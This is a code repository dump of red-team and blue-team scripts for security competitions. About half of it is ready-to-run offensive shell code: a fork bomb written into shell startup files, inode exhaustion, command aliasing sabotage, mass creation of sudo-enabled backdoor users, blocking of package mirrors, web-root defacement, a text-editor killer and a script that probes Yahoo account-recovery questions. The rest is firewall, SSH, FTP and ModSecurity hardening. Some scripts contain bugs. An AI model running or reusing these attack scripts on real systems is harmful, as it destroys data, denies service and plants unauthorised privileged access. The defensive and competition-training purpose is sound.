├── red ├── bombs │ ├── termbomb.sh │ ├── cronbomb.sh │ ├── bashbomb.sh │ └── bomb.sh ├── inodes.sh ├── evil.sh ├── TEKiller.sh ├── random_users.sh ├── random_users2.sh ├── autohost.sh ├── shell_roulette.sh ├── web_deface.sh ├── SE │ ├── yahoo_recover.sh │ └── email_scrape.py ├── binswap.py └── slowloris.pl ├── README.md └── blue ├── quota.sh ├── ftp ├── vsftpd3.conf ├── anon.sh ├── proftpd.sh ├── vsftpd.sh └── proftpd.conf ├── httpd ├── httpd.sh └── httpd.conf ├── apache2 ├── ssl.sh ├── mod ├── conf ├── apache2.sh └── default ├── ipfilter.sh ├── users-linux.sh ├── users-freebsd.sh ├── check.pl ├── setup_ssh.sh ├── ipfw.sh ├── startup-bsd.sh ├── jail_maker.sh ├── jail_maker_freebsd.sh ├── startup-linux.sh └── iptables.sh /red/bombs/termbomb.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | while true; do 4 | gnome-terminal &disown 5 | done 6 | -------------------------------------------------------------------------------- /red/bombs/cronbomb.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | bomb= # this will be your bomb you want in the crontab 3 | echo "@reboot $bomb"|crontab 4 | -------------------------------------------------------------------------------- /red/bombs/bashbomb.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | echo ':(){echo "balls"|wall;:|:&disown};:&disown' >> ~/.bashrc 3 | echo ':(){echo "balls"|wall;:|:&disown};:&disown' >> ~/.bash_profile -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | tools 2 | ===== 3 | 4 | Useful scripts for quickly securing or destroying boxes. Made specifically for competitions like ISTS and other similar security competitions. Not recommended for real world use. 
5 | 6 | The red folder has offensive/attack/red team tools, while the blue folder has defensive/blue team tools. 7 | -------------------------------------------------------------------------------- /red/inodes.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #Takes up all inodes - makes it impossible to write to disk 3 | 4 | PRFX="/usr/local"; 5 | FS="/"; 6 | freeI=$(/bin/df -i "$FS"|/usr/bin/awk '{print $4}'|/usr/bin/tail -n1); 7 | 8 | for i in `seq 1 100`; 9 | do for q in `seq 1 $((freeI/100))`; 10 | do touch "${PRFX}/.$i.$q"; 11 | done & 12 | done 13 | -------------------------------------------------------------------------------- /red/evil.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [ "`whoami`" == "root" ]; then 4 | apt-get install sl -y || yum install sl -y 5 | path=`which sl` 6 | echo "alias rm='${path}/sl'" >> ~/.bashrc 7 | echo "alias cp='${path}/sl'" >> ~/.bashrc 8 | echo "alias mv='${path}/sl'" >> ~/.bashrc 9 | echo "alias cd='${path}/sl'" >> ~/.bashrc 10 | echo "alias exit='${path}/sl'" >> ~/.bashrc 11 | fi &> /dev/null 12 | -------------------------------------------------------------------------------- /blue/quota.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | #Setting a disk quota for a user 3 | 4 | #Installing quota 5 | sudo apt-get install quota -y & 6 | 7 | while [ true ]; do 8 | read -p "Please enter a user (leave blank to exit): " USER 9 | 10 | if [ "$USER" == "" ]; then 11 | echo "No user given. Bye!" 
12 | exit 0 13 | fi 14 | 15 | #setting the quota 16 | #setquota args: block soft limit, block hard limit, inode soft limit, inode hard limit 17 | setquota $USER 0 512020 0 1000 -a 18 | done 19 | -------------------------------------------------------------------------------- /blue/ftp/vsftpd3.conf: -------------------------------------------------------------------------------- 1 | listen=YES 2 | anonymous_enable=NO 3 | write_enable=YES 4 | local_enable=YES 5 | dirmessage_enable=YES 6 | local_umask=022 7 | use_localtime=YES 8 | xferlog_enable=YES 9 | connect_from_port_20=YES 10 | idle_session_timeout=600 11 | data_connection_timeout=120 12 | ftpd_banner=Welcome. 13 | chroot_local_user=YES 14 | secure_chroot_dir=/home/ 15 | allow_writeable_chroot=YES 16 | pam_service_name=ftp 17 | rsa_cert_file=/etc/ssl/private/vsftpd.pem 18 | rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key 19 | -------------------------------------------------------------------------------- /red/TEKiller.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | #Text Editor killer 3 | 4 | sleepTime=1 5 | if [ "$#" -gt 0 ]; then #if they gave an arg, make sure it's a number, then assign it 6 | echo "$1" | /bin/grep -qP '^\d+$' && sleepTime="$1" 7 | fi 8 | 9 | while true; do 10 | #get all dirs in /proc, check to see if the program is a text editor 11 | #if it is, cat the stdin fd associated with it and it won't work. 
12 | for dir in $(/bin/ls -d /proc/*/); do 13 | file=$(/bin/ls -l "${dir}exe" 2>/dev/null | awk '{ print $NF }') 14 | $(echo "$file" | /bin/grep -qPw 'vi|vim|nano|emacs|pico') && /bin/cat "${dir}fd/0" &> /dev/null &disown 15 | done 16 | sleep "$sleepTime" 17 | done 18 | -------------------------------------------------------------------------------- /red/random_users.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env 2 | 3 | end="500" 4 | groups="sudo admin root wheel sudoers adm sys bin daemon shutdown ssh sshd ftp apache httpd" 5 | sudoFile="/etc/sudoers" 6 | for i in $(seq 1 $end); do 7 | user="$(echo "${RANDOM}${RANDOM}" | md5sum | cut -b 1-14)" 8 | useradd -m "$user" 9 | 10 | #make sure user was added successfully 11 | ret=$(echo $?) 12 | if [ "$ret" -ne 0 ]; then 13 | continue 14 | fi 15 | 16 | usermod -s /bin/bash "$user" 17 | #add to typical admin groups 18 | for group in $groups; do 19 | usermod -a -G "$group" "$user" 20 | done 21 | 22 | #add to sudoers to file 23 | echo "$user ALL=(ALL:ALL) ALL" >> "$sudoFile" 24 | done 25 | -------------------------------------------------------------------------------- /red/random_users2.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env 2 | 3 | sleepTime="600" 4 | groups="sudo admin root wheel sudoers adm sys bin daemon shutdown ssh sshd ftp apache httpd" 5 | sudoFile="/etc/sudoers" 6 | while true; do 7 | user="$(echo "${RANDOM}${RANDOM}" | md5sum | cut -b 1-14)" 8 | useradd -m "$user" 9 | 10 | #make sure user was added successfully 11 | ret=$(echo $?) 
12 | if [ "$ret" -ne 0 ]; then 13 | continue 14 | fi 15 | 16 | usermod -s /bin/bash "$user" 17 | #add to typical admin groups 18 | for group in $groups; do 19 | usermod -a -G "$group" "$user" 20 | done 21 | 22 | #add to sudoers to file 23 | echo "$user ALL=(ALL:ALL) ALL" >> "$sudoFile" 24 | 25 | sleep "$" 26 | done 27 | -------------------------------------------------------------------------------- /red/autohost.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | #find sites used to get packages from, then set them to 0.0.0.0 in the /etc/hosts files 3 | 4 | #determine if redhat or debian based, then get sites based on that 5 | if [ -f "/etc/redhat-release" ]; then 6 | sites="$(/usr/bin/yum repolist 2>/dev/null | fgrep '*' | awk '{print $NF}')" 7 | elif [ -f "/etc/debian_version" ]; then 8 | sites="$(/bin/grep deb /etc/apt/sources.list | grep -v '#' | awk '{print $2}' | cut -d / -f 3 | grep -oPi '\w+\.\w+$' | sort | uniq)" 9 | else 10 | echo "failed host detection, not red hat or debian." 11 | exit -1 12 | fi 13 | 14 | hostsFile="/etc/hosts" 15 | for site in "$sites"; do 16 | echo >> "$hostsFile" 17 | echo "0.0.0.0 *.${site}" >> "$hostsFile" 18 | done 19 | -------------------------------------------------------------------------------- /red/shell_roulette.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | sleepTime=30 4 | 5 | #get shell for the user 6 | shell="$(getent passwd "$(whoami)" | awk -F : '{print $NF}' | awk -F / '{print $NF}')" 7 | if [ "$shell" = "" ]; then 8 | shell="bash" 9 | fi 10 | 11 | #make sure history file exists and whatnot 12 | histFile="$HOME/.${shell}_history" 13 | if [ ! -e "$histFile" ]; then 14 | histFile="$HOME/.history" 15 | if [ ! -e "$histFile" ]; then 16 | echo "couldn't find history file :(" 17 | exit -1 18 | fi 19 | fi 20 | 21 | #roulette forever! 
22 | while true; do 23 | lines="$(wc -l "$histFile" | awk '{print $1}')" 24 | rand="$(($RANDOM % $lines))" 25 | cmd="$(sed "${rand}q;d" "$histFile")" 26 | echo "$cmd" 27 | $cmd 28 | 29 | sleep "$sleepTime" 30 | done 31 | -------------------------------------------------------------------------------- /red/web_deface.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | PATH="/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin" 4 | defaceVal="balls :3" 5 | 6 | #determine if redhat or debian based 7 | if [ -f "/etc/redhat-release" ]; then 8 | yum install httpd -y 9 | webDir="/etc/httpd" 10 | elif [ -f "/etc/debian_version" ]; then 11 | apt-get install apache2 -y 12 | webDir="/etc/apache2" 13 | else 14 | echo "failed install, not red hat or debian." 15 | exit -1 16 | fi 17 | 18 | webDirs="$(grep -RhP "^\s+DocumentRoot.*" "$webDir" | awk '{print $2}' | sort | uniq)" 19 | 20 | #overwrite all files in every web dir with $defaceVal 21 | for dir in $webDirs; do 22 | cd "$dir" 23 | for file in $(ls); do 24 | if [ ! 
-d "$file" ]; then 25 | echo "$defaceVal" > "$file" 26 | fi 27 | done 28 | done 29 | -------------------------------------------------------------------------------- /blue/ftp/anon.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | #Anon FTP 3 | 4 | #stopping 5 | service vsftpd stop 6 | 7 | #making a new conf file 8 | touch /etc/vsftpd-anon.conf 9 | 10 | #adding a new folder for anon 11 | mkdir /home/anon_user 12 | 13 | #writing the new conf file 14 | echo "listen=YES" > /etc/vsftpd-anon.conf 15 | echo "local_enable=NO" >> /etc/vsftpd-anon.conf 16 | echo "anonymous_enable=YES" >> /etc/vsftpd-anon.conf 17 | echo "write_enable=YES" >> /etc/vsftpd-anon.conf 18 | echo "anon_root=/home/anon_user" >> /etc/vsftpd-anon.conf 19 | echo "anon_max_rate=2048000" >> /etc/vsftpd-anon.conf 20 | echo "xferlog_enable=YES" >> /etc/vsftpd-anon.conf 21 | echo "listen_address=<>" >> /etc/vsftpd-anon.conf 22 | echo "listen_port=21" >> /etc/vsftpd-anon.conf 23 | 24 | #adding config file to the vsftpd instance 25 | vsftpd /etc/vsftpd-anon.conf 26 | service vsftpd start 27 | -------------------------------------------------------------------------------- /red/SE/yahoo_recover.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #Checks Yahoo e-mail for recovery questions 3 | 4 | #username array 5 | USERNAME=(user@yahoo.com) 6 | 7 | for i in "${USERNAME[@]}" 8 | do 9 | 10 | OUTPUT=`curl -i -s -k -X 'POST' -H 'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.4.0' -H 'Referer: https://edit.yahoo.com/mforgot' -H 'Content-Type: application/x-www-form-urlencoded' -b 'B=dpsc3ehaibqtm&b=3&s=u5; ywadp10001468467156=2807892355; fpc10001468467156=ZeqKfREC||; fpc10001756605956=ZSzJATQq||' --data-binary 
$'stage=fe101&login='"$i"'&cc=&done=http%3A%2F%2Fwww.yahoo.com&intl=us&lang=en-US&partner=reg&src=&appsrc=&ostype=&fs=uq4bhkqHafAYb39UO5XNCBlntocFN2hDy4gbQpjkmCnz6iGWaWvFZkIzqhA3yK4c5kft98qO' 'https://edit.yahoo.com/mforgot' | grep "Secret Question" -A 1` 11 | 12 | if [ ! -z "$OUTPUT" ] 13 | then 14 | echo $i 15 | echo $OUTPUT 16 | fi 17 | done 18 | -------------------------------------------------------------------------------- /blue/httpd/httpd.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #Installing httpd 3 | 4 | #installing if not already there 5 | yum install httpd -y 6 | 7 | #stopping 8 | service httpd stop 9 | 10 | #editing home page 11 | cd /var/www/html 12 | touch index.html 13 | echo "HEY" >> index.html 14 | 15 | #moving in conf file 16 | mv /etc/httpd/conf/httpd.conf /etc/httpd/conf/httpd.conf.bak 17 | mv `pwd`/httpd.conf /etc/httpd/conf/httpd.conf 18 | 19 | #reloading and restarting 20 | service httpd reload 21 | service httpd restart 22 | 23 | 24 | ##installing mod sec 25 | #yum install gcc make 26 | #yum install libxml2 libxml2-devel httpd-devel pcre-devel curl-devel 27 | #cd /usr/src 28 | #wget http://www.modsecurity.org/download/modsecurity-apache_2.6.6.tar.gz 29 | #tar xzf modsecurity-apache_2.6.6.tar.gz 30 | #cd modsecurity-apache_2.6.6 31 | #./configure 32 | #make install 33 | #cp modsecurity.conf-recommended /etc/httpd/conf.d/modsecurity.conf 34 | 35 | -------------------------------------------------------------------------------- /blue/apache2/ssl.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #Setting up SSL on apache2 3 | 4 | #ask if they've installed before 5 | read -p "Have you generated your SSL Cert? 
[y/n]: " ANS 6 | 7 | #if this is the first time 8 | if [ "$ANS" == "n" ]; then 9 | #enabling 10 | a2enmod ssl 11 | service apache2 restart 12 | 13 | #making a new dir 14 | mkdir /etc/apache2/ssl 15 | cd /etc/apache2/ssl 16 | echo "Run the following command:" 17 | echo "openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/apache2/ssl/apache.key -out /etc/apache2/ssl/apache.crt" 18 | exit 19 | 20 | #if they've run the script before 21 | elif [ "$ANS" == "y" ]; then 22 | mv /etc/apache2/sites-available/default-ssl /etc/apache2/sites-available/default-ssl.bak 23 | mv `pwd`/default /etc/apache2/sites-available/default-ssl 24 | a2ensite default-ssl 25 | service apache2 reload 26 | echo "Remember to edit the default-ssl config file!" 27 | exit 28 | 29 | #if a wrong selection 30 | else 31 | echo "Incorrect selection" 32 | exit 33 | fi 34 | -------------------------------------------------------------------------------- /blue/ftp/proftpd.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | #Gettng ftp server up and running 3 | #This works for vsftp and proftpd currently 4 | 5 | #Asking to see if they have a ftp user 6 | read -p "Do you have FTP User(s)? (y/n): " ANS 7 | ANS=`echo $ANS | tr '[:lower:]' '[:upper:]'` 8 | if [ "$ANS" == "Y" ]; then 9 | read -p "Enter user(s) name (separate each with a space): " FTPUSERS 10 | else 11 | echo "Please make a user FIRST!" 12 | exit 13 | fi 14 | 15 | #reinstalling proftpd 16 | apt-get remove proftpd -y 17 | apt-get install proftpd -y 18 | 19 | #backing up the old config file 20 | mv /etc/proftpd/proftpd.conf /etc/proftpd/proftpd.conf.bak 21 | 22 | #moving in the new config file 23 | cp `pwd`/proftpd.conf /etc/proftpd/proftpd.conf 24 | 25 | #making a chroot for each user 26 | cd /home 27 | for FTPUSER in $FTPUSERS; do 28 | if test ! 
-e $FTPUSER; then 29 | mkdir $FTPUSER 30 | chown $FTPUSER:$FTPUSER $FTPUSER/ 31 | chmod 755 $FTPUSER/ 32 | fi 33 | done 34 | 35 | #restarting 36 | service proftpd restart 37 | echo "DONE!" 38 | -------------------------------------------------------------------------------- /blue/ipfilter.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | path=/sbin 4 | file=/etc/ipf/ipf.conf 5 | 6 | #allow icmp; block bad stuffz 7 | echo "block return-icmp(net-unr) in proto udp all" >> $file # return ICMP error packets for invalid UDP packets 8 | echo "pass in quick proto icmp from any to any keep state group 100" > $file 9 | echo "pass out quick proto icmp from any to any keep state group 200" >> $file 10 | 11 | #regular rules 12 | echo "block in log quick all with short" >> $file 13 | echo "pass in quick proto tcp from any to any port = 80 keep state" >> $file #web 14 | echo "pass out quick proto tcp from any to any port = 80 keep state" >> $file #web 15 | echo "pass in quick proto tcp from any to any port = 443 keep state" >> $file #web 16 | echo "pass out quick proto tcp from any to any port = 443 keep state" >> $file #web 17 | echo "pass out quick proto udp from any to any port = domain keep state" >> $file #dns 18 | 19 | 20 | #block all else 21 | echo "block in from any to any head 100" >> $file 22 | echo "block out from any to any head 200" >> $file 23 | 24 | -------------------------------------------------------------------------------- /blue/users-linux.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | #edit users - change password for all users and disable other accounts 3 | 4 | read -s -p "Enter password for all non-privileged users: " pass 5 | echo 6 | read -s -p "Enter password again: " pass_two 7 | echo 8 | 9 | while [ "$pass" != "$pass_two" ]; do 10 | echo "Passwords did not match. Try again." 
11 | read -s -p "Enter password for all non-privileged users: " pass 12 | echo 13 | read -s -p "Enter password again: " pass_two 14 | echo 15 | done 16 | 17 | for user in $(awk -F":" '{if($3>=500) print $1}' /etc/passwd); do 18 | echo "$user:$pass" | chpasswd 19 | done 20 | 21 | echo "Be careful not to disable a useful/necessary account." 22 | users=`/bin/cat /etc/passwd | grep -o '^\w*'` 23 | for user in $users; do 24 | if [ "$user" == "root" ]; then 25 | continue 26 | fi 27 | read -p "Do you want to disable '$user' (Y/N): " answer 28 | answer=`echo $answer | /usr/bin/tr '[:lower:]' '[:upper:]'` 29 | if [ "$answer" == "Y" -o "$answer" == "YES" ]; then 30 | usermod $user -s /bin/nologin 31 | fi 32 | done 33 | -------------------------------------------------------------------------------- /blue/users-freebsd.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | #edit users - change password for all users and disable other accounts 3 | 4 | read -s -p "Enter password for all non-privileged users: " pass 5 | echo 6 | read -s -p "Enter password again: " pass_two 7 | echo 8 | 9 | while [ "$pass" != "$pass_two" ]; do 10 | echo "Passwords did not match. Try again." 11 | read -s -p "Enter password for all non-privileged users: " pass 12 | echo 13 | read -s -p "Enter password again: " pass_two 14 | echo 15 | done 16 | 17 | for user in $(awk -F":" '{if($3>=500) print $1}' /etc/passwd); do 18 | echo "$pass" | pw usermod $user -h 0 19 | done 20 | 21 | echo "Be careful not to disable a useful/necessary account." 
22 | users=`/bin/cat /etc/passwd | grep -o '^\w*'` 23 | for user in $users; do 24 | if [ "$user" == "root" ]; then 25 | continue 26 | fi 27 | read -p "Do you want to disable '$user' (Y/N): " answer 28 | answer=`echo $answer | /usr/bin/tr '[:lower:]' '[:upper:]'` 29 | if [ "$answer" == "Y" -o "$answer" == "YES" ]; then 30 | pw usermod $user -m -s /usr/sbin/nologin 31 | fi 32 | done -------------------------------------------------------------------------------- /blue/ftp/vsftpd.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | #Getting ftp server up and running 3 | #This works for vsftp and proftpd currently 4 | 5 | #Asking to see if they have a ftp user 6 | read -p "Do you have FTP User(s)? (y/n): " ANS 7 | ANS=`echo $ANS | tr '[:lower:]' '[:upper:]'` 8 | if [ "$ANS" == "Y" ]; then 9 | read -p "Enter user(s) name (separate each with a space): " FTPUSERS 10 | else 11 | echo "Please make a user FIRST!" 12 | exit 13 | fi 14 | 15 | #removing any existing vsftpd package, then fetching the pinned 3.0.2-3 i386 .deb over plain HTTP (no checksum or signature check) 16 | apt-get remove vsftp -y 17 | wget -q http://ftp.debian.org/debian/pool/main/v/vsftpd/vsftpd_3.0.2-3_i386.deb 18 | echo "Finished downloading..." 19 | 20 | #backing up the old config file (if there is one) 21 | mv /etc/vsftpd.conf /etc/vsftpd.conf.bak 22 | 23 | #installing and moving custom configuration in 24 | dpkg -i vsftpd_3.0.2-3_i386.deb 25 | cp vsftpd3.conf /etc/vsftpd.conf 26 | 27 | #making a chroot for each user 28 | cd /home 29 | for FTPUSER in $FTPUSERS; do 30 | if test ! -e $FTPUSER; then 31 | mkdir $FTPUSER 32 | chown $FTPUSER:$FTPUSER $FTPUSER/ 33 | chmod 755 $FTPUSER/ 34 | fi 35 | done 36 | 37 | #restarting 38 | service vsftpd stop 39 | service vsftpd start 40 | echo "DONE! 
Finished installing vsftpd" 41 | 42 | #removing install file 43 | cd $OLDPWD 44 | rm vsftpd_3.0.2-3_i386.deb 45 | -------------------------------------------------------------------------------- /blue/check.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | #Jackson Sadowski 3 | #Directory Monitor 4 | 5 | my $initialTime = `date +"%Y-%m-%d %T"`; 6 | my @initialFiles = `ls -1 --file-type | grep -v '/' | sed s/@\$//`; 7 | my @initialDirs = `ls -l | grep ^d | cut -d' ' -f9`; 8 | 9 | chomp @initialFiles; 10 | chomp @initialDirs; 11 | 12 | #initializing hashes 13 | my %files = (); 14 | my %dirs = (); 15 | my $date; 16 | 17 | #getting the current date of the files 18 | foreach (@initialFiles){ 19 | $date = `stat -c%y $_ | cut -d. -f1`; 20 | $files{ $_ } = $date; 21 | } 22 | 23 | #getting the current date of the dirs 24 | foreach (@initialDirs){ 25 | $date = `stat -c%y $_ | cut -d. -f1`; 26 | $dirs{ $_ } = $date; 27 | } 28 | 29 | #continually checks to see if files have changes 30 | while(1){ 31 | my @currentFiles = `ls -1 --file-type | grep -v '/' | sed s/@\$//`; 32 | my @currentDirs = `ls -l | grep ^d | cut -d' ' -f9`; 33 | chomp @currentFiles; 34 | chomp @currentDirs; 35 | 36 | #making new hash for current files/dir 37 | #initializing hashes 38 | my %newFiles = (); 39 | my %newDirs = (); 40 | 41 | #getting the current date of the files 42 | foreach (@currentFiles){ 43 | $date = `stat -c%y $_ | cut -d. -f1`; 44 | $newFiles{ $_ } = $date; 45 | } 46 | 47 | #getting the current date of the dirs 48 | foreach (@currentDirs){ 49 | $date = `stat -c%y $_ | cut -d. 
-f1`; 50 | $newDirs{ $_ } = $date; 51 | } 52 | 53 | #at this point we should check if 54 | #the arrays of hashes are the same 55 | #alert if there's a change 56 | #log the file 57 | 58 | #sleeping 59 | sleep(2); 60 | } 61 | -------------------------------------------------------------------------------- /blue/setup_ssh.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | #Setting up SSH on a box 3 | 4 | #ssh configuration file 5 | sshd_config='/etc/ssh/sshd_config' 6 | 7 | service sshd stop 8 | 9 | #backup the old configuration files 10 | /bin/cp $sshd_config $sshd_config.bak 11 | /bin/mv /etc/nologin /etc/nologin.bak 12 | /bin/mv /etc/host.allow /etc/host.allow.bak 13 | /bin/mv /etc/hosts.deny /etc/hosts.deny.bak 14 | 15 | #make new configuration files 16 | echo "Protocol 2" > $sshd_config #only allow SSH protocol 2 17 | echo "Port 22" >> $sshd_config #set port 18 | echo "X11Forwarding no" >> $sshd_config 19 | echo "ClientAliveInterval 300" >> $sshd_config #auto disconnect idle hosts 20 | echo "ClientAliveCountMax 0" >> $sshd_config 21 | echo "IgnoreRhosts yes" >> $sshd_config #disable rsh access 22 | echo "RhostsRSAAuthentication no" >> $sshd_config 23 | echo "HostBasedAuthentication no" >> $sshd_config 24 | echo "ChallengeResponseAuthentication yes" >> $sshd_config 25 | echo "UsePAM yes" >> $sshd_config 26 | echo "PermitRootLogin no" >> $sshd_config 27 | echo "PermitEmptyPasswords no" >> $sshd_config 28 | echo "LogLevel INFO" >> $sshd_config 29 | echo "#AllowUsers sshuser1 sshuser2 sshuser3" >> $sshd_config #you can use this line after you know the users 30 | echo "#AllowGroups sshusers" >> $sshd_config #use after you have users in a group 31 | 32 | #chroot members of group sshusers into /var/jail 33 | echo "Match group sshusers" >> $sshd_config 34 | echo " ChrootDirectory /var/jail" >> $sshd_config #set up chroot dir 35 | echo " X11Forwarding no" >> $sshd_config 36 | echo " AllowTcpForwarding no" >> $sshd_config 
37 | echo "AllowTcpForwarding no" >> $sshd_config 38 | 39 | service sshd start 40 | -------------------------------------------------------------------------------- /blue/ftp/proftpd.conf: -------------------------------------------------------------------------------- 1 | Include /etc/proftpd/modules.conf 2 | UseIPv6 off 3 | IdentLookups off 4 | ServerName "Welcome" 5 | ServerIdent on "FTP Server." 6 | ServerType standalone 7 | DeferWelcome off 8 | MultilineRFC2228 on 9 | DefaultServer on 10 | ShowSymlinks off 11 | TimeoutNoTransfer 600 12 | TimeoutStalled 600 13 | TimeoutIdle 1200 14 | DisplayLogin "Greetings." 15 | DisplayChdir .message true 16 | ListOptions "-l" 17 | DenyFilter \*.*/ 18 | DefaultRoot ~ 19 | Port 21 20 | 21 | 22 | MaxInstances 5 23 | User ftpguy 24 | Group ftpusers 25 | Umask 022 022 26 | AllowOverwrite on 27 | TransferLog /var/log/proftpd/xferlog 28 | SystemLog /var/log/proftpd/proftpd.log 29 | 30 | QuotaEngine off 31 | 32 | 33 | Ratios off 34 | 35 | 36 | DelayEngine on 37 | 38 | 39 | ControlsEngine off 40 | ControlsMaxClients 2 41 | ControlsLog /var/log/proftpd/controls.log 42 | ControlsInterval 5 43 | ControlsSocket /var/run/proftpd/proftpd.sock 44 | 45 | 46 | AdminControlsEngine off 47 | 48 | Include /etc/proftpd/conf.d/ 49 | -------------------------------------------------------------------------------- /blue/apache2/mod: -------------------------------------------------------------------------------- 1 | 2 | SecRuleEngine On 3 | SecRequestBodyAccess On 4 | SecRule REQUEST_HEADERS:Content-Type "text/xml" \ 5 | "phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=XML" 6 | SecRequestBodyLimit 16384000 7 | SecRequestBodyNoFilesLimit 16384000 8 | SecRequestBodyInMemoryLimit 131072 9 | SecRequestBodyLimitAction Reject 10 | SecRule REQBODY_ERROR "!@eq 0" \ 11 | "phase:2,t:none,log,deny,status:400,msg:'Failed to parse request body.',logdata:'%{reqbody_error_msg}',severity:2" 12 | SecRule MULTIPART_STRICT_ERROR "!@eq 0" \ 13 | 
"phase:2,t:none,log,deny,status:44,msg:'Multipart request body \ 14 | failed strict validation: \ 15 | PE %{REQBODY_PROCESSOR_ERROR}, \ 16 | BQ %{MULTIPART_BOUNDARY_QUOTED}, \ 17 | BW %{MULTIPART_BOUNDARY_WHITESPACE}, \ 18 | DB %{MULTIPART_DATA_BEFORE}, \ 19 | DA %{MULTIPART_DATA_AFTER}, \ 20 | HF %{MULTIPART_HEADER_FOLDING}, \ 21 | LF %{MULTIPART_LF_LINE}, \ 22 | SM %{MULTIPART_SEMICOLON_MISSING}, \ 23 | IQ %{MULTIPART_INVALID_QUOTING}, \ 24 | IH %{MULTIPART_INVALID_HEADER_FOLDING}, \ 25 | IH %{MULTIPART_FILE_LIMIT_EXCEEDED}'" 26 | SecRule MULTIPART_UNMATCHED_BOUNDARY "!@eq 0" \ 27 | "phase:2,t:none,log,deny,status:44,msg:'Multipart parser detected a possible unmatched boundary.'" 28 | SecPcreMatchLimit 1000 29 | SecPcreMatchLimitRecursion 1000 30 | 31 | SecRule TX:/^MSC_/ "!@streq 0" \ 32 | "phase:2,t:none,deny,msg:'ModSecurity internal error flagged: %{MATCHED_VAR_NAME}'" 33 | SecResponseBodyAccess On 34 | SecResponseBodyMimeType text/plain text/html text/xml 35 | SecResponseBodyLimit 524288 36 | SecResponseBodyLimitAction ProcessPartial 37 | SecTmpDir /tmp/ 38 | SecDataDir /tmp/ 39 | SecAuditEngine RelevantOnly 40 | SecAuditLogRelevantStatus "^(?:5|4(?!04))" 41 | SecAuditLogParts ABIJDEFHZ 42 | SecAuditLogType Serial 43 | SecAuditLog /var/log/apache2/modsec_audit.log 44 | SecArgumentSeparator & 45 | SecCookieFormat 0 46 | -------------------------------------------------------------------------------- /blue/ipfw.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | #set path of ipfw 3 | path=/sbin 4 | 5 | $path/ipfw -q -f flush #flush all existing rules 6 | 7 | #loopback stuff 8 | $path/ipfw -q add allow all from any to any via lo0 #allow loopback traffic 9 | $path/ipfw -q add deny ip from any to 127.0.0.0/8 #filter loopback traffic 10 | $path/ipfw -q add deny ip from 127.0.0.0/8 to any #filter loopback traffic 11 | 12 | #stateful firewall stuffz. 
and fragmented packet stuff 13 | $path/ipfw -q add check-state 14 | $path/ipfw -q add deny all from any to any frag # deny fragmented packets 15 | 16 | #allow established connections 17 | $path/ipfw -q add allow all from any to any established 18 | 19 | #services 20 | $path/ipfw -q add allow tcp from any to any 20 #ftp 21 | $path/ipfw -q add allow tcp from any to any 21 #ftp 22 | $path/ipfw -q add allow tcp from any to any 1024-65535 keep-state #for active ftp 23 | $path/ipfw -q add allow tcp from any to me 22 in keep-state #ssh in 24 | $path/ipfw -q add allow tcp from me to any 22 out keep-state #ssh out 25 | #$path/ipfw -q add allow tcp from any to any 25 #smtp; could add keep-state for more securities 26 | $path/ipfw -q add allow udp from me to any 53 out keep-state #dns 27 | #$path/ipfw -q add allow udp from any 68 to any 67 out keep-state #dhcp 28 | #$path/ipfw -q add allow udp from any 67 to any 68 in keep-state #dhcp 29 | $path/ipfw -q add allow tcp from any to any 80 #http 30 | $path/ipfw -q add allow tcp from any to any 443 #https 31 | 32 | #normal stuff, allow good in, keep bad out 33 | $path/ipfw -q add allow icmp from any to any icmptype 0,8 #allow ping echo request/reply only 34 | $path/ipfw -q add deny ip from me to me in keep-state #stop spoof/smurf attacks 35 | $path/ipfw -q add deny tcp from any to any setup in keep-state #external setup requests 36 | $path/ipfw -q add deny tcp from any to any 0 in setup keep-state #limit OS detection 37 | $path/ipfw -q add deny udp from any to any 0 in keep-state #limit OS detection 38 | 39 | #block the rest 40 | $path/ipfw -q add deny ip6 from any to any #block all ipv6 41 | $path/ipfw -q add deny log all from any to any #block the rest 42 | -------------------------------------------------------------------------------- /blue/apache2/conf: -------------------------------------------------------------------------------- 1 | LockFile ${APACHE_LOCK_DIR}/accept.lock 2 | PidFile ${APACHE_PID_FILE} 3 | Timeout 300 4 | 
